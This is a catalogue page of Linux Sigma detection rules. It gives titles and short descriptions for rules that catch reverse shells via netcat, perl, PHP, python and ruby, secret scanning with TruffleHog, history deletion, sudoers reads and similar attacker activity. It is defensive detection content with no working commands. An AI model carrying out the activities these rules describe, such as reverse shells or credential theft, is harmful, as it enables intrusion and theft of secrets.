Sigma Rules
241 rules found
Mount Execution With Hidepid Parameter
Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system
Potential Netcat Reverse Shell Execution
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
Shell Execution via Nice - Linux
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Nohup Execution
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments
Suspicious Nohup Execution
Detects execution of binaries located in potentially suspicious locations via "nohup"
OMIGOD SCX RunAsProvider ExecuteScript
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
OMIGOD SCX RunAsProvider ExecuteShellCommand
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.
Potential Perl Reverse Shell Execution
Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
Potential PHP Reverse Shell
Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
Pnscan Binary Data Transmission Activity
Detects command line patterns associated with the use of Pnscan for sending and receiving binary data across the network. This behavior has been identified in a Linux malware campaign targeting Docker, Apache Hadoop, Redis, and Confluence and was previously used by the threat actor known as TeamTNT
Connection Proxy
Detects setting proxy configuration
PUA - TruffleHog Execution - Linux
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intended for use in CI pipelines and security assessments, It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.
Python WebServer Execution - Linux
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a web server without requiring additional software. This technique is commonly used in post-exploitation scenarios as it provides a simple method for transferring files between the compromised host and attacker-controlled systems.
Python Spawning Pretty TTY Via PTY Module
Detects a python process calling to the PTY module in order to spawn a pretty tty which could be indicative of potential reverse shell activity.
Python Reverse Shell Execution Via PTY And Socket Modules
Detects the execution of python with calls to the socket and pty module in order to connect and spawn a potential reverse shell.
Inline Python Execution - Spawn Shell Via OS System Library
Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell.
Remote Access Tool - Team Viewer Session Started On Linux Host
Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
Linux Remote System Discovery
Detects the enumeration of other remote systems.
Linux Package Uninstall
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg".
Shell Execution via Rsync - Linux
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Suspicious Invocation of Shell via Rsync
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
Potential Ruby Reverse Shell
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell
Scheduled Cron Task/Job - Linux
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
Security Software Discovery - Linux
Detects usage of system utilities (only grep and egrep for now) to discover security software discovery
Disabling Security Tools
Detects disabling security tools
Disable Or Stop Services
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services
Setuid and Setgid
Detects suspicious change of file privileges with chown and chmod commands
Shell Invocation Via Ssh - Linux
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Potential Linux Amazon SSM Agent Hijacking
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Chmod Suspicious Directory
Detects chmod targeting files in abnormal directory paths.
Container Residence Discovery Via Proc Virtual FS
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem
Suspicious Curl File Upload - Linux
Detects a suspicious curl process start the adds a file to a web request
Suspicious Curl Change User Agents - Linux
Detects a suspicious curl process start on linux with set useragent options
Docker Container Discovery Via Dockerenv Listing
Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery
Potentially Suspicious Execution From Tmp Folder
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Potential Discovery Activity Using Find - Linux
Detects usage of "find" binary in a suspicious manner to perform discovery
Suspicious Git Clone - Linux
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious
History File Deletion
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity
Print History File Contents
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
Linux HackTool Execution
Detects known hacktool execution based on image name.
Potential Container Discovery Via Inodes Listing
Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container.
Interactive Bash Suspicious Children
Detects suspicious interactive bash as a parent to rather uncommon child processes
Suspicious Java Children Processes
Detects java process spawning suspicious children
Linux Network Service Scanning Tools Execution
Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.
Linux Shell Pipe to Shell
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell
Access of Sudoers File Content
Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Linux Recon Indicators
Detects events with patterns found in commands used for reconnaissance on linux systems
Script Interpreter Spawning Credential Scanner - Linux
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets, as seen in the "Shai-Hulud: The Second Coming" campaign.